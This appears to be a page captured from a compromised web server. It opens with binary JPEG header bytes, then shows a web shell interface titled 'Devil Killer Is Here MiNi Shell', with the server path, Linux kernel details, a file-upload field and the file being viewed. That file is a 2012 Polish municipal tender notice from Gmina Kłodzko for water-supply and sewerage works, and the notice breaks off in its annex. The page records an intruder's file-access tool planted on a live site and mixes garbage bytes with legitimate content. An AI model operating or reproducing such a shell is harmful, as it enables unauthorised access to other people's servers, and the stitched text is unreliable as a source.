JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120112/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120112/12707-N-2012.html

<p class="kh_header"><b>Kłodzko: Porządkowanie gospodarki wodno-ściekowej w Gminie Kłodzko - II etap</b><br>
<b>Numer ogłoszenia: 12707 - 2012; data zamieszczenia: 12.01.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Gminy Kłodzko , ul. Okrzei 8a, 57-300 Kłodzko, woj. dolnośląskie, tel. 074 6474100, faks 074 6474103.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.klodzko.gmina.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Porządkowanie gospodarki wodno-ściekowej w Gminie Kłodzko - II etap.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zamówienie obejmuje realizację projektu p.n.: Porządkowanie gospodarki wodno-ściekowej w Gminie Kłodzko - II etap, składającego się z zadań j.n.:
- nr 1 - Remont stacji uzdatniania wody w Krosnowicach
- nr 2 - Budowa wodociągu i kanalizacji sanitarnej w Ołdrzychowicach Kłodzkich
- nr 3 - Remont wodociągu w Szalejowie Dolnym i Szalejowie Górnym 
- nr 4 - Remont wodociągu w Żelaźnie
- nr 5 - Budowa sieci kanalizacji sanitarnej w Żelaźnie - etap III


Charakterystyka poszczególnych zadań:

1.1. Remont stacji uzdatniania wody w Krosnowicach
Zadanie obejmuje remont istniejącej stacji uzdatniania wody, zlokalizowanej na działce nr 786/2 w Krosnowicach przy ul. Wodnej.
W trakcie remontu możliwe jest czasowe wyłączenie wody, jednak przerwa  w dostawie wody nie może być dłuższa niż 4 godziny dziennie i po uzgodnieniu terminu z użytkownikiem, tj. Zakładem Gospodarki Mieszkaniowej i Komunalnej Gminy Kłodzko z/s w Ołdrzychowicach Kłodzkich przy ul. Osiedlowej 7.
Zakres robót:
- remont budynku SUW, w tym: roboty rozbiórkowe, murarskie, tynkarskie, dekarskie, posadzkowe, malarskie, docieplenie budynku , remont instalacji elektrycznej i odgromowej, wod.-kan.
- wykonanie przyłącza kanalizacji sanitarnej wraz z naprawą nawierzchni drogi dojazdowej
- remont ogrodzenia
- podniesienie obudowy studni głębinowej S3
- wymiana pompy głębinowej w studni S3 - 1 kpl.
- montaż pompy głębinowej w studni w studni S3A - 1 kpl.
- demontaż zbiornika hydroforowego
- montaż kompletnej stacji uzdatniania wody z filtrem i stacją dozowania chemii
- montaż zestawu hydroforowego
- wykonanie nowych rurociągów między-obiektowych w obrębie stacji uzdatniania wody
- czyszczenie zbiorników na wodę
- wykonanie zasilania, sterowania i automatyki
- remont oświetlenia zewnętrznego,
- wykonanie wymaganych prób, sprawdzeń, badań oraz rozruchu technologicznego SUW
- obsługa geodezyjna, w tym wykonanie wytyczenia obiektów oraz inwentaryzacji geodezyjna powykonawczej.

1.2. Budowa wodociągu i kanalizacji sanitarnej w Ołdrzychowicach Kłodzkich
Zadanie obejmuje budowę sieci kanalizacji sanitarnej grawitacyjnej z rur PCV DN200 o długości 993,70 m oraz sieci wodociągowej z rur PE110 o długości 1685,70 m i odgałęzień od sieci PE40 o długości 242,4 m , dla domów jednorodzinnych i zabudowy zagrodowej w Ołdrzychowicach Kłodzkich.
Trasa kanalizacji: poboczem drogi gminnej, pasem drogowym oraz odcinkami po terenie prywatnym.
Studnie kanalizacyjne systemowe przelotowe i połączeniowe z tworzyw sztucznych DN 400 oraz betonowe DN1000 i 1200 mm .
Trasa wodociągu: poboczem drogi gminnej, pasem drogowym (częściowo w jednym wykopie z kanalizacją sanitarną ), terenem zielonym odcinkami po terenie prywatnym.
Zakres robót obejmuje rozebranie i naprawę nawierzchni utwardzonych, rozebranie i naprawę ogrodzeń, obiektów małej architektury, odtworzenie terenów zielonych.
Na trasie kanalizacji przejścia przeciskiem pod ciekami wodnymi.
Na trasie wodociągu przeciski pod ciekami wodnymi.
Poziom wód gruntowych wysoki, możliwy intensywny napływ wody do wykopów.
W trakcie budowy kanalizacji i wodociągu należy zapewnić dostęp do posesji (kładki dla pieszych ), oraz zabezpieczyć teren, na którym prowadzone są roboty.
W trakcie realizacji zadania wystąpią znaczne ograniczenia ruch kołowego. Roboty należy realizować odcinkami, aby zapewnić dojazd do poszczególnych posesji.
Zakres robót:
- roboty ziemne,
- ułożenie kanałów sanitarnych grawitacyjnych O 200 z rur PCV klasy SN8 - 993,7 m 
- wykonanie studzienek kanalizacyjnych z O 400(425) z tworzyw sztucznych - 26 szt. 
- wykonanie studzienek kanalizacyjnych z O 1000/1200 betonowych - 13 szt.
- ułożenie sieci wodociągowych z rur polietylenowych PE110 SDR17, PN10 - 1685,7 m
- ułożenie sieci wodociągowych z rur polietylenowych PE40 SDR17, PN10 - 242,4 m
- umieszczenie rurociągów pod dnem cieków wodnych
- wykonanie przekroczeń przez drogi gminne i powiatową, (pod jezdnią asfaltową przeciski),
- rozbiórka i odbudowa nawierzchni drogowej,
- wykonanie wymaganych prób, badań i sprawdzeń, 
- obsługa geodezyjna, w tym wykonanie wytyczenia obiektów i inwentaryzacji geodezyjnej
   powykonawczej.

1.3. Remont wodociągu w Szalejowie Dolnym i Szalejowie Górnym
Zadanie obejmuje remont istniejącej sieci wodociągowej, polegający na wymianie 2503 m awaryjnych (nieszczelnych) odcinków sieci i uzbrojenia (w tym przekroczeń sieci przez cieki wodne i drogi) we wsi Szalejów Dolny i Szalejów Górny.
Zakres robót:
- roboty ziemne,
- wymiana sieci wodociągowej na sieci z rur PE, PEHDo długości łącznie 2503 m 
  o średnicach DN 160, 110, 90, 50 mm, w tym: przejścia przez cieki wodne : 4 szt.
  przejścia pod drogą krajową - 1 szt., pod drogą powiatową - 4 szt., pod drogą gminną - 1 szt.
- wykonanie wymaganych prób, badań, sprawdzeń, 
- obsługa geodezyjna, w tym wykonanie wytyczenia obiektów oraz inwentaryzacji 
   geodezyjna powykonawczej.

1.4. Remont wodociągu w Żelaźnie 
Zadanie obejmuje remont istniejącej sieci wodociągowej, polegający na wymianie 1251 m awaryjnych (nieszczelnych) odcinków sieci i uzbrojenia (w tym przekroczeń sieci przez cieki wodne i drogi) oraz 69 m odgałęzień od sieci (związanych z przepięciem istniejących przyłączy do nowej sieci) we wsi Żelazno.
Zakres robót:
- roboty ziemne,
- wodociąg PE DN 110, 90 mm - 1189 m
- wodociąg z rur wzmocnionych PE RC DN 110, 90 mm - 62 m
- wodociąg PE DN 50, 40, 32 mm - 69 m
- rozebranie i odtworzenie nawierzchni utwardzonych, rozebranie i odtworzenie ogrodzeń, obiektów małej architektury, odtworzenie terenów zielonych,
- wykonanie 2 przejść przeciskiem pod droga krajową
- obsługa geodezyjna, w tym wykonanie wytyczenia obiektów oraz inwentaryzacji geodezyjna powykonawczej.

1.5. Budowa sieci kanalizacji sanitarnej w Żelaźnie - etap III
Zadanie obejmuje budowę sieci kanalizacji sanitarnej wraz z 1 sieciową pompownią ścieków i 1 przydomową pompownią ścieków oraz przykanalikami (tj. odgałęziami od sieci - przekroczeniami przez drogi i ciek wodny) do granicy działki lub pierwszej studni na działce dla istniejących budynków mieszkalnych. 
Odprowadzenie ścieków sanitarnych poprzez włączenie do studzienki w istniejącej sieci gminnej kanalizacji sanitarnej. 
Zakres robót:
- roboty ziemne,
- ułożenie sieci kanałów sanitarnych grawitacyjnych z rur PCV O200 - 858 m 
-  ułożenie kanałów odgałęźnych - 147 m, w tym: grawitacyjnych z rur PCV O160 - 112 m, oraz rurociągu tłocznego z rur PE O110 - 35 m
- montaż studzienek kanalizacyjnych z tworzyw sztucznych O600 - 34 szt.
- montaż studzienek kanalizacyjnych z tworzyw sztucznych O315 - 4 szt.
- wykonanie rurociągu tłocznego z rur PE O110 - 326m 
- dostawa i montaż pompowni ścieków z instalacją zasilającą i automatyką oraz  
  zagospodarowaniem terenu,
- dostawa i montaż 1 przepompowni przydomowej wraz z zasilaniem, 
- naprawa drogi asfaltowej po wykonaniu wykopów,
- umocnienie skarpy rowu.
- wykonanie przekroczeń przez drogi gminne, drogę krajową krajową, (pod jezdnią asfaltową przeciski), oraz teren kolejowy zamknięty PKP.
- rozbiórka i odbudowa nawierzchni drogowej,
- wykonanie wymaganych prób, sprawdzeń, oraz rozruchu,
- obsługa geodezyjna, w tym wykonanie wytyczenia obiektów oraz inwentaryzacji geodezyjna powykonawczej.
Pompownię ścieków należy dostarczyć na plac budowy jako gotowy obiekt z pełnym wyposażeniem wewnętrznym, tj. kompleksowe zestawienie urządzeń ze zbiornikiem, pompami, sterowaniem i wyposażeniem. Zbiornik pompowni winien być wykonany z polimerobetonu lub systemowy z kręgów betonowych B450. Średnica wewnętrzna zbiornika - 1200 mm . Pompownię wyposażyć w dwie pompy zatapialne z wolnym przelotem, praca jednej winna zapewnić 100 % przepływ ścieków. Automatyka sterująca zapewnić musi naprzemienne załączanie się pomp, a w przypadku dużego napływu cieczy obie pompy pracują jednocześnie. Elementy wyposażenia pompowni ze stali nierdzewnej..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.11.12.00-0, 45.23.24.10-9, 45.23.32.20-7, 45.45.30.00-7, 45.23.11.00-6, 45.23.13.00-8, 45.23.31.20-6, 45.00.00.00-7, 45.10.00.00-8, 45.23.24.00-6, 45.23.32.00-1, 45.31.00.00-3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> .</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający żąda wniesienie wadium w wysokości:
Zadanie 1 - w wysokości 5 000,00 PLN , słownie: pięć tysięcy złotych.
Zadanie 2 - w wysokości 15 000,00 PLN , słownie: piętnaście tysięcy złotych.
Zadanie 3 - w wysokości 2 500,00 PLN , słownie: dwa tysiące pięćset złotych.
Zadanie 2 - w wysokości 2 500,00 PLN , słownie: dwa tysiące pięćset złotych.
Zadanie 2 - w wysokości 10 000,00 PLN , słownie: dziesięć tysięcy złotych.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca dołączy oświadczenie, że posiada uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca wykaże wykonanie co najmniej 2 robót budowlanych w zakresie objętym przedmiotem zamówienia o wartości co najmniej równej cenie oferty każda.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca dołączy oświadczenie, że dysponuje odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca dołączy oświadczenie, że dysponuje  osobami zdolnymi do wykonania zamówienia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca dołączy oświadczenie, że znajduje się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zgodnie z art. 144 ust. 1 ustawy Zamawiający przewiduje możliwość zmiany zawartej umowy w stosunku do treści oferty, na podstawie której dokonany będzie wybór wykonawcy w przypadku wystąpienia co najmniej jednej z okoliczności wymienionych poniżej: 
1)	zmiana terminu realizacji przedmiotu umowy spowodowane klęskami żywiołowymi i warunkami atmosferycznymi uniemożliwiającymi prowadzenie robót budowlanych, przeprowadzenie prób i sprawdzeń, dokonywanie odbiorów, 
2)	zmiany spowodowane warunkami terenowymi w szczególności odmienne od przyjętych w dokumentacji projektowej istnienie podziemnych urządzeń, instalacji lub obiektów infrastrukturalnych, 
3)	 wstrzymania przez Zamawiającego wykonania robót, które nie wynika z okoliczności leżących po stronie Wykonawcy (Nie dotyczy okoliczności wstrzymania robót przez inspektora nadzoru w przypadku stwierdzenia nieprawidłowości zawinionych przez Wykonawcę),
4)	konieczność wykonania przez Zamawiającego korekty projektu dla usunięcia wad dostarczonej dokumentacji, 
5)	zmiany technologiczne, w szczególności konieczność zrealizowania projektu przy zastosowaniu innych rozwiązań niż wskazane w dokumentacji projektowej w sytuacji, gdyby zastosowanie przewidzianych rozwiązań groziło niewykonaniem lub wadliwym wykonaniem projektu, 
6)	zmiana osób, przy pomocy których wykonawca realizuje przedmiot umowy, na inne legitymujące się co najmniej równoważnymi uprawnieniami i kwalifikacjami, o których mowa w ustawie Prawo budowlane lub innych ustawach, a także w siwz, również będzie wymagała zaakceptowania przez zamawiającego,
7)	zmiany dot. wykonania robót wynikających ze zmiany dokumentacji projektowej i specyfikacji technicznych, 
8)	zmiana obowiązującej stawki VAT.
Powyższe postanowienia stanowią katalog zmian, na które Zamawiający może wyrazić zgodę, jednocześnie nie stanowią one zobowiązania Zamawiającego na ich wprowadzenie.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.ug-klodzko.dolnyslask.pl/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Kłodzko, Ul. Okrzei 8a, 57-300 Kłodzko, pok. 408.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 01.02.2012 godzina 10:00, miejsce: Urząd Gminy Kłodzko, Ul. Okrzei 8a, 57-300 Kłodzko, pok. 207.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt współfinansowany w ramach Programu Rozwoju Obszarów Wiejskich na lata 2007-2013, działanie: podstawowe usługi dla gospodarki i ludności wiejskiej, współfinansowany ze środków Unii Europejskiej..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Remont stacji uzdatniania wody w Krosnowicach.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie obejmuje remont istniejącej stacji uzdatniania wody, zlokalizowanej na działce nr 786/2 w Krosnowicach przy ul. Wodnej.
W trakcie remontu możliwe jest czasowe wyłączenie wody, jednak przerwa  w dostawie wody nie może być dłuższa niż 4 godziny dziennie i po uzgodnieniu terminu z użytkownikiem, tj. Zakładem Gospodarki Mieszkaniowej i Komunalnej Gminy Kłodzko z/s w Ołdrzychowicach Kłodzkich przy ul. Osiedlowej 7.
Zakres robót:
- remont budynku SUW, w tym: roboty rozbiórkowe, murarskie, tynkarskie, dekarskie, posadzkowe, malarskie, docieplenie budynku , remont instalacji elektrycznej i odgromowej, wod.-kan.
- wykonanie przyłącza kanalizacji sanitarnej wraz z naprawą nawierzchni drogi dojazdowej
- remont ogrodzenia
- podniesienie obudowy studni głębinowej S3
- wymiana pompy głębinowej w studni S3 - 1 kpl.
- montaż pompy głębinowej w studni w studni S3A - 1 kpl.
- demontaż zbiornika hydroforowego
- montaż kompletnej stacji uzdatniania wody z filtrem i stacją dozowania chemii
- montaż zestawu hydroforowego
- wykonanie nowych rurociągów między-obiektowych w obrębie stacji uzdatniania wody
- czyszczenie zbiorników na wodę
- wykonanie zasilania, sterowania i automatyki
- remont oświetlenia zewnętrznego,
- wykonanie wymaganych prób, sprawdzeń, badań oraz rozruchu technologicznego SUW
- obsługa geodezyjna, w tym wykonanie wytyczenia obiektów oraz inwentaryzacji geodezyjna powykonawczej..</p></li>
